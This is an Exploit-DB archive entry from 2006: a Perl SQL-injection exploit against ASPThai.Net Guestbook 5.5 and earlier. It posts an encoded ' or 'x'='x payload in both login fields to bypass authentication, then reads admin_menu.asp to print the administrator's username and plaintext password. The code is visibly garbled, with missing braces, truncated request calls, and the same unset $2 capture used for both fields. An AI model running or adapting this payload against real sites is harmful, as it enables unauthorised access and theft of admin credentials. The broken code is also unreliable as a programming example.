ASPThai.Net Guestbook <= 5.5 Auth Bypass SQL Injection Exploit

ID EDB-ID:1472
Type exploitdb
Reporter Zodiac
Modified 2006-02-06T00:00:00


ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit. Webapps exploit for asp platform

# SQL Injection Exploit for ASPThai.Net Guestbook &lt;= 5.5  
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# #g00ns  email =
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;

$Server = $ARGV[0];

if($Server =~m/http/g)
$Server=~ 'http://$Server';
else {
  print $error;

if(!$Server) {usage();exit() ;}


print "\r\nGrabbing Username And Password\r\n\n";

#Login's and stores a cookie to view admin panel later

 $xpl = LWP::UserAgent-&gt;new() or die;
 $cookie_jar = HTTP::Cookies-&gt;new();


 $res = $xpl-&gt;post(
 Content =&gt; [ 

	'txtUserName' =&gt; '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 
	'txtUserPass' =&gt; '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
	'Submit' =&gt; '-= Login =-',

# Create a request
my $req = HTTP::Request-&gt;new(GET =&gt; 



$req-&gt;header('Referer', $Server.'admin_menu.asp');

my $res = $xpl-&gt;request($req);

$info= $res-&gt;content;

if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) 
 die "Error Connecting...\r\n"; 

#Check the outcome of the response

$User = $2;
$Pass= $2;

print "UserName:$User\r\nPassword:$Pass\r\n";

sub head()
 print "\n=======================================================================\r\n";
 print "* ASPThai.Net Guestbook version 5.5 SQL Injection by *\r\n";   
 print "=======================================================================\r\n";
sub usage()
 print " Usage: &lt;Site&gt;  \r\n\n";
 print " &lt;Site&gt; - Full path to Guestbook e.g. \r\n";
 print "=======================================================================\r\n";
 print "   -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
 print " #g00ns\r\n";
 print "=======================================================================\r\n";

# [2006-02-06]